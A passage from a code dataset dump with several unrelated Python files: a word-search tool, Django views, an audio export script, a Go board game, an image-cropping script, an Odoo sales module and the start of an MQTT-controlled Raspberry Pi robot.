Dictionary file to read from.\r\n :return: None.\r\n \"\"\"\r\n for line in read_file:\r\n word = line.strip(\"\\n\").upper()\r\n add_to_dict(word, table_out)\r\n\r\n\r\ndef get_input():\r\n \"\"\"\r\n Prompts user for input.\r\n\r\n Special Cases Return Code\r\n ============= ===========\r\n 1. User wants to 0\r\n quit.\r\n\r\n 2. User has 1\r\n provided None\r\n value.\r\n\r\n 3. User wants to 2\r\n clear the\r\n current\r\n search result\r\n\r\n\r\n :return: Inputted data. Or return code for special cases.\r\n \"\"\"\r\n _input = input(\":~$ \")\r\n\r\n if _input.upper() == \"QUIT\":\r\n return 0\r\n elif _input is None:\r\n return 1\r\n elif _input.upper() == \"CLEAR\":\r\n return 2\r\n else:\r\n return _input\r\n\r\n\r\ndef decider(option):\r\n \"\"\"\r\n Decides whether or not the user wants to perform a regex operation on a\r\n previous search, or if the user wants to conduct a new search. Extracts\r\n input data from command entered.\r\n\r\n Option codes:\r\n -1 = Invalid option\r\n 0 = Regex operation.\r\n 1 = Search operation.\r\n\r\n :param option: User input.\r\n :return: A tuple, 0th element is option code. 1st element is extracted\r\n input data.\r\n \"\"\"\r\n regex_reg_match = re.match(r\"^r\\((.+)\\)\", option)\r\n regex_search_match = re.match(r\"^s\\(([\\w \\(\\)]+)\\)\", option)\r\n bad_case = (regex_reg_match is None and regex_search_match is None) or \\\r\n (regex_reg_match is not None and regex_search_match is not None)\r\n\r\n if bad_case:\r\n return False\r\n elif regex_reg_match is not None:\r\n return 0, regex_reg_match.group(1)\r\n elif regex_search_match is not None:\r\n return 1, regex_search_match.group(1)\r\n\r\n\r\ndef gen_matched_words(pattern, table_in):\r\n \"\"\"\r\n Selects words from table_in that match the regex pattern and appends it to\r\n table_out.\r\n\r\n :param pattern: Regex pattern.\r\n :param table_in: Input table.\r\n :param table_out: Output table.\r\n :return: True if successful filtering. Else, false.\r\n \"\"\"\r\n for key in table_in:\r\n for word in table_in[key]:\r\n match = re.match(pattern, word, re.IGNORECASE)\r\n\r\n if match is not None:\r\n yield word\r\n\r\n\r\ndef tuple_switch_string(char_list):\r\n \"\"\"\r\n Converts a tuple of chars to a string and returns this, and vise-versa\r\n (except return a list of chars).\r\n\r\n :param char_list: Iterable of chars.\r\n :return: Alternate form.\r\n \"\"\"\r\n if type(char_list) in (tuple, list):\r\n ret_str = str()\r\n\r\n for char in char_list:\r\n ret_str += char\r\n\r\n return ret_str\r\n elif type(char_list) == str:\r\n return [char for char in char_list]\r\n\r\n\r\ndef add_to_dict(word, table_out):\r\n \"\"\"\r\n Add a single word to their appropriate keyed list in the dictionary\r\n table_out.\r\n\r\n :param word: The word to add.\r\n :param table_out: Dict to add the word to.\r\n :return: None. False if failed.\r\n \"\"\"\r\n key = string_to_key(word)\r\n\r\n if key not in table_out:\r\n table_out.update({key: [word]})\r\n elif key in table_out and word not in table_out[key]:\r\n table_out[key].append(word)\r\n else:\r\n return False\r\n\r\n\r\ndef string_to_key(word):\r\n \"\"\"\r\n Takes in an unordered string of chars and orders them. Returning this key.\r\n\r\n :param word: Unordered string of chars.\r\n :return: Key.\r\n \"\"\"\r\n char_list = tuple_switch_string(word)\r\n char_list.sort()\r\n\r\n return tuple_switch_string(char_list).upper()\r\n\r\n\r\ndef gen_key_permutations(key):\r\n \"\"\"\r\n Generates all the possible combinations with the chars in the given key.\r\n Yields each combination.\r\n\r\n :param key: The string of chars to work with.\r\n :return: None\r\n \"\"\"\r\n for x in range (1, len(key)+1):\r\n for perm in permutations(key, x):\r\n yield tuple_switch_string(perm)\r\n\r\n\r\ndef gen_possible_words(search_key, table_in):\r\n \"\"\"\r\n Finds words which can be made using the chars in the search key. Yields\r\n these words.\r\n\r\n :param search_key: The chars used in ordered format.\r\n :param table_in: The table to look into.\r\n :return: None\r\n \"\"\"\r\n for permute in gen_key_permutations(search_key):\r\n if permute in table_in:\r\n for words in table_in[permute]:\r\n yield words\r\n\r\n\r\ndef gen_insert_wildcard(string):\r\n \"\"\"\r\n Yields all possible combinations of letters by substituting underscores\r\n with all letters of the alphabet. So dog___ first yields dogAAA, then\r\n dogAAB, AAC ... dogZZY, dogZZZ. This uses a simple recursive algorithm\r\n \r\n :param string: The string with the wildcard chars (_).\r\n :return: None.\r\n \"\"\"\r\n wc_count = string.count(\"_\")\r\n\r\n if wc_count == 1:\r\n for letter in ALPHABET:\r\n yield re.sub(\"_\", letter, string)\r\n else:\r\n next_wc_index = string.find(\"_\")\r\n old_string = string[:next_wc_index + 1]\r\n new_string = string[next_wc_index + 1:]\r\n\r\n for letter in ALPHABET:\r\n old_string_modified = re.sub(\"_\", letter, old_string)\r\n yield from gen_insert_wildcard(old_string_modified + new_string)\r\n\r\n\r\ndef print_dict(table_in):\r\n \"\"\"\r\n Prints a given table of words in an appropriate format.\r\n\r\n :param table_in: Input table.\r\n :return: None.\r\n \"\"\"\r\n if len(table_in) == 0:\r\n print(\"The table is empty. Try a new search.\")\r\n for key in table_in:\r\n print(\"Possible words using {}: {}\".format(key, table_in[key]))\r\n\r\n# Importing the words from dictionary file.\r\nprint(\"Importing dictionary...\")\r\nfile_r = open(\"Words.txt\", \"r\")\r\nimport_dict(_DICT, file_r)\r\nfile_r.close()\r\n\r\n# Main loop\r\nwhile True:\r\n # Checking input special cases.\r\n user_input = get_input()\r\n if user_input == 0:\r\n print(\"Quit.\")\r\n break\r\n elif user_input == 1:\r\n print(\"Nothing was entered. Try again.\")\r\n continue\r\n elif user_input == 2:\r\n dict_search.clear()\r\n print(\"Search results cleared.\")\r\n continue\r\n\r\n # If no special input cases, decide what the user wants to do.\r\n decision = decider(user_input)\r\n if not decision:\r\n print(\"Invalid input.\")\r\n continue\r\n elif decision[0] == 0:\r\n dict_regex.clear()\r\n\r\n if len(dict_search) > 0:\r\n # In the case that a search was done before, perform regex\r\n # on search results.\r\n for word in gen_matched_words(decision[1], dict_search):\r\n add_to_dict(word, dict_regex)\r\n else:\r\n # Else perform on main dictionary.\r\n for word in gen_matched_words(decision[1], _DICT):\r\n add_to_dict(word, dict_regex)\r\n\r\n print_dict(dict_regex)\r\n elif decision[0] == 1:\r\n dict_search.clear()\r\n\r\n if decision[1].count(\"_\") > 0:\r\n # If a search was done with wildcard chars.\r\n for letters in gen_insert_wildcard(decision[1]):\r\n key = string_to_key(letters)\r\n\r\n for word in gen_possible_words(key, _DICT):\r\n add_to_dict(word, dict_search)\r\n else:\r\n key = string_to_key(decision[1])\r\n\r\n for word in gen_possible_words(key, _DICT):\r\n add_to_dict(word, dict_search)\r\n\r\n print_dict(dict_search)\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168336075","text":"from django.template import Context, loader\nfrom events.models import Event\nfrom range.models import ShootingRangeDetail, RSOCalendar\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nimport json\nimport datetime\nfrom django.core import serializers\n\n\ndef index(request):\n latest_event_list = Event.objects.all().order_by('-event_creation_date')[:10]\n page_content = ShootingRangeDetail.objects.latest('creation_date')\n c = Context({\n 'latest_event_list': latest_event_list,\n 'page_content': page_content,\n })\n return render(request, 'range/index.html', c)\n\ndef home_index(request):\n latest_event_list = Event.objects.all().order_by('-event_creation_date')[:10]\n c = Context({\n 'latest_event_list': latest_event_list,\n })\n return render(request, 'range/range_home.html',c)\n\ndef rso_calendar_data(request):\n rso_calendar_data = RSOCalendar.objects.all()\n\n json_res = []\n\n for record in rso_calendar_data:\n json_obj = dict(\n pk=record.pk, \n rso_person_first=record.rso_person.first_name,\n rso_person_last=record.rso_person.last_name,\n rso_start_date=str(record.rso_start_date), \n rso_end_date=str(record.rso_end_date),\n )\n json_res.append(json_obj)\n\n return HttpResponse(json.dumps(json_res), content_type=\"application/json\")\n\n\n\n\n\n","sub_path":"shfc_site/range/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583350003","text":"# 唤醒词导出\n\nimport os\nimport csv\nimport re\nimport time\nimport shutil\nimport json\nimport openpyxl as px\nfrom pydub import AudioSegment\n\n\ndef mkdir_if_not_exists(filepath):\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n\n\nclass Wav():\n valid_flag = ['4']\n\n def __init__(self, src, dst, wavinfo):\n self.src = src\n self.dst = dst\n self.wavinfo = wavinfo\n\n @property\n def wav_path(self):\n return os.path.join(self.src, self.group, self.name) + '.wav'\n\n @property\n def txt_path(self):\n return self.wav_path.replace('.wav', '.txt')\n\n @property\n def dst_wav_path(self):\n return os.path.join(self.dst, self.group, self.name) + '.wav'\n\n @property\n def dst_txt_path(self):\n return self.dst_wav_path.replace('.wav', '.txt')\n\n @property\n def name(self):\n return self.wavinfo[1]\n\n @property\n def group(self):\n return self.wavinfo[0]\n\n @property\n def taskid(self):\n try:\n return self.name[:6]\n except TypeError as e:\n import pdb;pdb.set_trace()\n\n @property\n def duration(self):\n wav = AudioSegment.from_file(self.wav_path)\n return wav.duration_seconds\n\n @property\n def index(self):\n # 有效返回索引,无效返回空\n if str(self.wavinfo[3]) in self.valid_flag:\n return str(int(self.name[-5:]))\n else:\n return ''\n\n def is_effective(self):\n if 1 <= int(self.name[-5]) <= 10:\n return True\n\n\nclass Group():\n def __init__(self, taskid, group, wavs):\n self.taskid = taskid\n self.group = group\n self.wavs = wavs\n\n @property\n def status(self):\n status = []\n for wav in self.wavs:\n if wav.index:\n status.append('1')\n else:\n status.append('')\n return status\n\n @property\n def duration(self):\n duration = 0.0\n for wav in self.wavs:\n duration += wav.duration\n return duration\n\n @property\n def validnum(self):\n return len([wav for wav in self.wavs if wav.index])\n\n\nclass Export():\n csv_title = ['任务期号', '组号', '有效条数', '总时长'] + [str(i) for i in range(1, 31)]\n\n def __init__(self, src, dst, infopath):\n self.src = src\n self.dst = dst\n self.infopath = infopath\n\n def load_xlsx(self):\n wb = px.load_workbook(self.infopath)\n workbook = {}\n for ws in wb:\n if ws.title != 'text':\n raise TypeError(\"please check your excel title {}\".format(ws.title))\n workbook[ws.title] = []\n for row in ws.rows:\n vals = []\n for cell in row:\n vals.append(cell.value)\n workbook[ws.title].append(vals)\n return workbook\n\n def get_wavs(self):\n return [Wav(self.src, self.dst, row) for row in self.load_xlsx()['text'][1:] if any(row)]\n\n def get_groups(self):\n groups = {}\n for wav in self.get_wavs():\n if wav.group in groups:\n groups[wav.group].wavs.append(wav)\n else:\n groups.update({wav.group: Group(wav.taskid, wav.group, [wav])})\n return groups\n\n def handle(self):\n infos = []\n infos.append(self.csv_title)\n for group in self.get_groups().values():\n # 合格15句抽出来\n if group.validnum > 15:\n for wav in group.wavs:\n if wav.index:\n mkdir_if_not_exists(os.path.dirname(wav.dst_wav_path))\n self.copy(wav.wav_path, wav.dst_wav_path)\n self.update_json(wav.txt_path, wav.dst_txt_path)\n info = [group.taskid, group.group, str(group.validnum), group.duration]\n info.extend(group.status)\n infos.append(info)\n else:\n print(\"此组合格句数少于15句:{}\".format(group.group))\n continue\n\n self.write(infos)\n\n def copy(self, src, dst):\n shutil.copy(src, dst)\n\n def update_json(self, srctxt, dsttxt):\n # 将TXT中的手机型号转换为ios,android\n with open(srctxt, 'r', encoding='utf-8') as f:\n json_data = json.loads(f.read().strip('\\ufeff'))\n iphone_type = json_data.get('userinfo', {}).get('MobileType', '')\n if iphone_type:\n if re.findall('iPhone|iPad', iphone_type):\n json_data['userinfo']['MobileType'] = 'ios'\n else:\n json_data['userinfo']['MobileType'] = 'android'\n\n with open(dsttxt, 'w', encoding='utf-8') as f:\n f.write(json.dumps(json_data, ensure_ascii=False))\n\n def write(self, infos):\n csv_path = os.path.join(self.dst, 'count_{}.csv'.format(time.strftime('%Y-%m-%d_%H-%M-%S')))\n with open(csv_path, 'w', newline='', encoding='gbk') as f:\n writer = csv.writer(f)\n for row in infos:\n writer.writerow(row)\n\n\nif __name__ == '__main__':\n while True:\n src = input(\"请输入原始音频路径:\")\n dst = input(\"请输入结果数据路径:\")\n infopath = input(\"请输入质检表路径:\")\n exporter = Export(src, dst, infopath)\n exporter.handle()\n flag = input(\"处理成功,按0,退出;按1,开始下一个\")\n if flag == '1':\n continue\n else:\n break\n","sub_path":"wake_words/wake_export.py","file_name":"wake_export.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360406192","text":"from enum import Enum\nimport enum\nimport numpy as np\nimport string\n\nclass State(enum.IntEnum):\n EMPTY = 0\n BLACK = 1\n WHITE = 2\n WALL = 3\n\nclass Baduk:\n size = 19\n size2 = 21\n current_board = None\n current_color = State.BLACK\n def __init__(self,size=19):\n self.size = size\n self.current_board = Board(size)\n self.size2 = size + 2\n\n def board_print(self):\n for line in range(self.size2):\n start = (self.size2 - line - 1) * self.size2\n end = (self.size2 - line) * self.size2\n print(self.current_board.ToString()[start:end].tostring())\n def board_move(self,x,y):\n rev = self.current_board.Move(x,y,self.current_color)\n if rev == True:\n if self.current_color == State.BLACK :\n self.current_color = State.WHITE\n else :\n self.current_color = State.BLACK\n\nclass Board:\n size = 19\n size2 = 21\n board_state = None\n board_group = None\n board_group_live = None\n board_group_next_group_number = 1\n def __init__(self):\n return\n def __init__(self,size=19):\n self.size = size\n self.size2 = size + 2\n self.board_state = np.zeros((self.size2,self.size2),dtype=np.int32)\n self.board_group = np.zeros((self.size2,self.size2),dtype=np.int32)\n for x in range(self.size2):\n for y in range(self.size2):\n self.board_group[x,y] = 0\n if x == 0 or y == 0 or x == self.size2 - 1 or y == self.size2 - 1 :\n self.board_state[x,y] = State.WALL\n else :\n self.board_state[x,y] = State.EMPTY\n self.board_group_live = {0:0}\n board_group_next_group_number = 1\n def clone(self):\n newone = Board()\n newone.size = self.size\n newone.size2 = self.size2\n newone.board_group_next_group_number = self.board_group_next_group_number\n newone.board_group_live = self.board_group_live.copy()\n np.copy(newone.board_group,self.board_group)\n np.copy(newone.board_state,self.board_state)\n \n return newone\n\n def __del__(self):\n del self.board_state\n del self.board_group\n del self.board_group_live\n\n def Move(self,x,y,color):\n if self.board_state[x,y] != State.EMPTY :\n return False\n else :\n near_empty_number = 0\n near_same_number = 0\n near_diff_number = 0\n dx = (1,-1,0,0)\n dy = (0,0,1,-1)\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n ncolor = self.board_state[nx,ny]\n if ncolor == State.EMPTY:\n near_empty_number+=1\n if ncolor == State.BLACK or ncolor == State.WHITE:\n if ncolor == color:\n near_same_number+=1\n else:\n near_diff_number+=1\n if near_same_number == 0 and near_diff_number == 0:\n self.board_state[x,y] = color\n self.board_group[x,y] = self.board_group_next_group_number\n self.board_group_live[self.board_group_next_group_number]= near_empty_number\n self.board_group_next_group_number+=1\n if near_empty_number == 0:\n self.clone().try_move()\n else: #주의에 빈곳이 있어서 무조건 놓을 수 있음\n self.board_state[x,y] = color\n #group을 주위와 맞추기 위해서 검색함\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n ncolor = self.board_state[nx,ny]\n if ncolor != State.EMPTY:\n self.board_group_live[ self.board_group[nx,ny]] -=1\n \n if color == ncolor and self.board_group[x,y]==0: #현재 빈곳이라 \n self.board_state[x,y] = color\n self.board_group[x,y] = self.board_group[nx,ny]\n self.board_group_live[self.self.board_group[x,y]]+=near_empty_number\n elif color == ncolor and self.board_group[x,y]!=0:\n gxy = self.board_group[x,y]\n gnxy = self.board_group[nx,ny]\n if gxy != gnxy:\n join_group( gxy , gnxy)\n\n # 일단 주변 그룹넘버로 정하고\n # 더 찾아서 더 있으면 join\n \n return True\n def try_move(self):\n return True\n def join_group(self,ga,gb):\n gmax = max(ga,gb)\n gmin = ga+gb - gmax\n for x in range(size2):\n for y in range(size2):\n if board_group[x,y]==gmax:\n board_group[x,y]=gmin\n self.board_group_live[gmin] += self.board_group_live[gmax]\n \n \n\n \n\n def ToString(self):\n rev = np.chararray((self.size2 ** 2))\n for x in range(self.size2):\n for y in range(self.size2):\n color = self.board_state[x,y]\n if color == State.EMPTY :\n rev[self.size2 * y + x] = '.'\n elif color == State.BLACK :\n rev[self.size2 * y + x] = 'B'\n elif color == State.WHITE:\n rev[self.size2 * y + x] = 'W'\n else :\n rev[self.size2 * y + x] = 'o'\n return rev\n\nclass BadukGame:\n \n def Run(self):\n baduk = Baduk(19)\n while(True):\n command = input(\"Input x,y (q:exit) : \")\n if len(command)<1:\n continue\n if command[0]=='q':\n print(\"End\")\n break\n left,right = command.split(',')\n print(\"left:\",left,\" right:\",right)\n \n x = int(left)\n y = int(right)\n baduk.board_move(x,y)\n baduk.board_print()\n\ndef __main__():\n baduk_game = BadukGame()\n baduk_game.Run()\n\n__main__()","sub_path":"baduk.py","file_name":"baduk.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47926223","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFrom:\nhttps://stackoverflow.com/questions/44383209/how-to-detect-edge-and-crop-an-image-in-python\n\n1. Convert to grayscale\n2. Threshold the image to only get the signature and nothing else\n3. Find where those pixels are that show up in the thresholded image\n4. Crop around that region in the original grayscale\n5. Create a new thresholded image from the crop that isn't as strict for display\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n# load image\nimg = cv2.imread('/home/antz/0_CV3/z-Test/crop/crop2/image.jpg') \nrsz_img = cv2.resize(img, None, fx=0.25, fy=0.25) # resize since image is huge\ngray = cv2.cvtColor(rsz_img, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\n# threshold to get just the signature\nretval, thresh_gray = cv2.threshold(gray, thresh=100, maxval=255, type=cv2.THRESH_BINARY)\n\n# find where the signature is and make a cropped region\npoints = np.argwhere(thresh_gray==0) # find where the black pixels are\npoints = np.fliplr(points) # store them in x,y coordinates instead of row,col indices\nx, y, w, h = cv2.boundingRect(points) # create a rectangle around those points\nx, y, w, h = x-10, y-10, w+20, h+20 # make the box a little bigger\ncrop = gray[y:y+h, x:x+w] # create a cropped region of the gray image\n\n# get the thresholded crop\nretval, thresh_crop = cv2.threshold(crop, thresh=200, maxval=255, type=cv2.THRESH_BINARY)\n\n# save image\ncv2.imwrite('output.png',thresh_crop)\n\n# display\ncv2.imshow(\"Cropped and thresholded image\", thresh_crop) \ncv2.waitKey(0)\n","sub_path":"0_Mixed/crop/crop2/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"30545576","text":"#自动调参\r\nimport numpy as np\r\nfrom sklearn.kernel_ridge import KernelRidge\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import GridSearchCV#自动调参矩阵\r\n\r\n#给随机数添加种子,让每次随机的结果都一致。\r\nrng = np.random.RandomState(0)\r\nx = 5 * rng.rand(100, 1)\r\ny = np.sin(x).ravel()\r\nprint(y)\r\n# 添加噪声\r\ny[::5] += 3 * (0.5 - rng.rand(x.shape[0] // 5))\r\n#创建模型\r\n# kr = KernelRidge(kernel=\"rbf\",gamma=0.1)\r\nkr = GridSearchCV(KernelRidge(),\r\n param_grid={\"kernel\": [\"rbf\", \"laplacian\", \"polynomial\",\"sigmoid\"],\r\n \"alpha\": [1e0, 0.1, 1e-2, 1e-3],\r\n \"gamma\": np.logspace(-2, 2, 20)})\r\n#模型拟合\r\nkr.fit(x,y)\r\n#创建测试数据\r\nX_plot = np.linspace(0, 5, 100)\r\n#自动调参的结果(效果最好的参数)\r\nprint(kr.best_score_, kr.best_params_)\r\n# y_kr = kr.predict(X_plot[:, None])\r\n# plt.scatter(x, y)#数据可视化\r\n# plt.plot(X_plot, y_kr, color=\"red\")#模型可视化\r\n# plt.show()\r\n# print(\"========================\")\r\n# print(y[::5])","sub_path":"08 机器学习03/test_20210202/test06.py","file_name":"test06.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21240018","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\nfrom lxml import etree\nfrom dateutil.relativedelta import relativedelta\n\n\nclass ResPartnerInh(models.Model):\n _inherit = 'res.partner'\n\n user_id = fields.Many2one('res.users', default=lambda self: self.env.uid)\n partner_id = fields.Many2one('res.partner')\n # is_same_branch = fields.Boolean(compute='compute_is_same_branch')\n\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if self._context.get('my_branch'):\n args += [('branch_id', '!=', False),\n ('branch_id', 'in', [branch.id for branch in self.env.user.branch_ids])]\n return super(ResPartnerInh, self)._search(args, offset=offset, limit=limit, order=order, count=count,\n access_rights_uid=access_rights_uid)\n\n # def compute_is_same_branch(self):\n #\n # for rec in self:\n # print()\n # if rec.branch_id.id == rec.env.user.branch_id.id:\n # rec.is_same_branch = True\n # else:\n # rec.is_same_branch = False\n\n @api.onchange('user_id')\n def onchange_partner_id(self):\n for rec in self:\n partner = self.env['res.partner'].search([('name', '=', rec.user_id.name)], limit=1)\n rec.partner_id = partner.id\n\n\nclass ProductTemplateInh(models.Model):\n _inherit = 'product.template'\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='tree', toolbar=False, submenu=False):\n # result = fields_view_get_extra(self, view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)\n result = super(ProductTemplateInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n\n if self.env.user.has_group('sales_consultant_user_rights.group_readonly_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n\n return result\n\n\nclass StockPickingInh(models.Model):\n _inherit = 'stock.picking'\n\n is_reserve_approved = fields.Boolean(default=False)\n is_notified = fields.Boolean(default=False)\n is_sent_for_approval = fields.Boolean(default=False)\n state = fields.Selection([\n ('draft', 'Draft'),\n ('waiting', 'Waiting Another Operation'),\n ('confirmed', 'Waiting'),\n ('manager_approval', 'Approval from Manager'),\n ('ceo_approval', 'Approval from CEO'),\n ('reserve_manager_approvals', 'Reserve Extension Approval from Manager'),\n ('reserve_ceo_approval', 'Reserve Extension Approval from CEO'),\n ('assigned', 'Ready'),\n ('done', 'Done'),\n ('cancel', 'Cancelled'),\n ], string='Status', compute='_compute_state',\n copy=False, index=True, readonly=True, store=True, tracking=True,\n help=\" * Draft: The transfer is not confirmed yet. Reservation doesn't apply.\\n\"\n \" * Waiting another operation: This transfer is waiting for another operation before being ready.\\n\"\n \" * Waiting: The transfer is waiting for the availability of some products.\\n(a) The shipping policy is \\\"As soon as possible\\\": no product could be reserved.\\n(b) The shipping policy is \\\"When all products are ready\\\": not all the products could be reserved.\\n\"\n \" * Ready: The transfer is ready to be processed.\\n(a) The shipping policy is \\\"As soon as possible\\\": at least one product has been reserved.\\n(b) The shipping policy is \\\"When all products are ready\\\": all product have been reserved.\\n\"\n \" * Done: The transfer has been processed.\\n\"\n \" * Cancelled: The transfer has been cancelled.\")\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):\n result = super(StockPickingInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if not self.env.user.has_group('sales_consultant_user_rights.group_show_do_buttons_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('duplicate', '0')\n temp.set('delete', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n if self.env.user.has_group('sales_consultant_user_rights.group_readonly_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n return result\n\n def test_action(self):\n print(self.state)\n\n def check_date(self):\n transfers = self.env['stock.picking'].search([('state', 'in', ['assigned'])])\n for rec in transfers:\n if rec.scheduled_date:\n diff = datetime.today() - rec.create_date\n if abs(diff.days) > 25:\n rec._create_notification()\n rec.is_notified = True\n if abs(diff.days) >= 30:\n if rec.is_reserve_approved:\n rec.scheduled_date = rec.scheduled_date + relativedelta(days=15)\n else:\n rec.do_unreserve()\n\n def _create_notification(self):\n # groupObj = self.env['res.groups'].search([('name', '=', \"Administrator\")])\n # user_list = []\n # for user in groupObj.users:\n # user_list.append(user.id)\n # if self.sale_id.user_id.id not in user_list:\n # if self.sale_id.user_id.id:\n # user_list.append(self.sale_id.user_id.id)\n # for i in user_list:\n # userObj = self.env['res.users'].browse([i])\n act_type_xmlid = 'mail.mail_activity_data_todo'\n summary = 'Reserved DO Notification'\n note = '25 Days passed.In 5 days left, DO no: ' + self.name + ' will be unreserved Automatically.'\n if act_type_xmlid:\n activity_type = self.sudo().env.ref(act_type_xmlid)\n model_id = self.env['ir.model']._get(self._name).id\n create_vals = {\n 'activity_type_id': activity_type.id,\n 'summary': summary or activity_type.summary,\n 'automated': True,\n 'note': note,\n 'date_deadline': datetime.today(),\n 'res_model_id': model_id,\n 'res_id': self.id,\n 'user_id': self.sale_id.user_id.id,\n }\n activities = self.env['mail.activity'].create(create_vals)\n\n def action_reserve_approval_manager(self):\n self.state = 'reserve_ceo_approval'\n\n def action_reserve_approval_ceo(self):\n # for rec in self:\n self.is_reserve_approved = True\n self.state = 'assigned'\n\n def action_send_for_approvals(self):\n for rec in self:\n rec.is_sent_for_approval = True\n rec.state = 'reserve_manager_approvals'\n\n\nclass AccountMoveInh(models.Model):\n _inherit = 'account.move'\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):\n result = super(AccountMoveInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if self.env.user.has_group('sales_consultant_user_rights.group_show_invoice_buttons_user'):\n pass\n else:\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('duplicate', '0')\n temp.set('delete', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n return result\n\n","sub_path":"sales_consultant_user_rights/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230524688","text":"import paho.mqtt.client as mqtt #mqtt https://github.com/eclipse/paho.mqtt.python\nimport time #tb6612fng\nimport RPi.GPIO as GPIO\nimport smbus #mpu6050\nimport math\nimport os #temperature & commands\nimport urllib #take picture\nfrom datetime import datetime\nimport subprocess\nfrom config import * #config file\n\ntopic =\"r2b2/7/tmp\"\nstart_time= time.time()\n\nGPIO.cleanup()\nGPIO.setmode(GPIO.BOARD) # Set GPIO mode to BCM\nGPIO.setwarnings(False);\n\n# PWM Frequency\npwmFreq = 100\n\n# Setup Pins for motor controllers\nGPIO.setup(12, GPIO.OUT) # PWMA 19\nGPIO.setup(18, GPIO.OUT) # AIN2 21\nGPIO.setup(16, GPIO.OUT) # AIN1 23\nGPIO.setup(22, GPIO.OUT) # STBY 12 \nGPIO.setup(15, GPIO.OUT) # BIN1 29\nGPIO.setup(13, GPIO.OUT) # BIN2 26\nGPIO.setup(11, GPIO.OUT) # PWMB 31\n\n#2nd\nGPIO.setup(19, GPIO.OUT) # PWMA 19\nGPIO.setup(23, GPIO.OUT) # AIN2 21\nGPIO.setup(21, GPIO.OUT) # AIN1 23\nGPIO.setup(24, GPIO.OUT) # STBY 12 \nGPIO.setup(29, GPIO.OUT) # BIN1 29\nGPIO.setup(26, GPIO.OUT) # BIN2 26\nGPIO.setup(31, GPIO.OUT) # PWMB 31\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n \n # Subscribing in on_connect() - if we lose the connection and\n # reconnect then subscriptions will be renewed.\n #client.subscribe(\"r2b2/7\")\n client.subscribe(\"r2b2/7/#\")\n\ndef on_disconnect(client, userdata, rc):\n print(\"*DISCONNECTED*\")\n mStop()\n\ndef on_message(client , userdata, msg):\n# print(\"msg: \"+msg.payload[:3]+\" - spd:\"+ msg.payload[4:])\n print(\"Msg: \"+str(msg.payload))\n if msg.payload == \"ping\":\n ping()\n if msg.payload == \"calibrate\": print(\"calibrate\")\n if msg.payload == \"pwrOff\": os.system('sudo shutdown -h now')\n if msg.payload == \"getTemp\": measure_temp(client)\n if msg.payload == \"stop\": mStop()\n if msg.payload == \"recStop\": os.system('sudo killall ffmpeg')\n if msg.payload == \"flwStop\": os.system('pgrep -f \"python3 /home/pi/R2B2_RaspberryPi/Code/track.py\" | xargs kill')\n\n if msg.payload == \"pic\":\n now = datetime.now()\n dt_string = now.strftime(\"pic_%d%m%Y_%H%M%S\")#pic_ddmmyyyy_hhmmss\n urllib.urlretrieve(\"http://\"+ipR2B2+\":8181/?action=snapshot\", \"/home/pi/Pictures/\"+dt_string+\".jpg\")\n \n if msg.payload[:3] == \"dwn\":\n runMotor(1,msg.payload[4:],1)#1\n runMotor2(0,msg.payload[4:],1)#4\n if msg.payload[:3] == \"mup\":\n runMotor(1,msg.payload[4:],0)#1\n runMotor2(0,msg.payload[4:],0)#4\n if msg.payload[:3] == \"rt+\":\n runMotor2(1,msg.payload[4:],0)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"rt-\":\n runMotor2(1,msg.payload[4:],1)#2\n runMotor(0,msg.payload[4:],1)#3\n \n if msg.payload[:3] == \"mRB\":\n runMotor2(1,msg.payload[4:],1)#2\n if int(msg.payload[4:])>20: runMotor(0,int(msg.payload[4:])-20,0)#3\n if msg.payload[:3] == 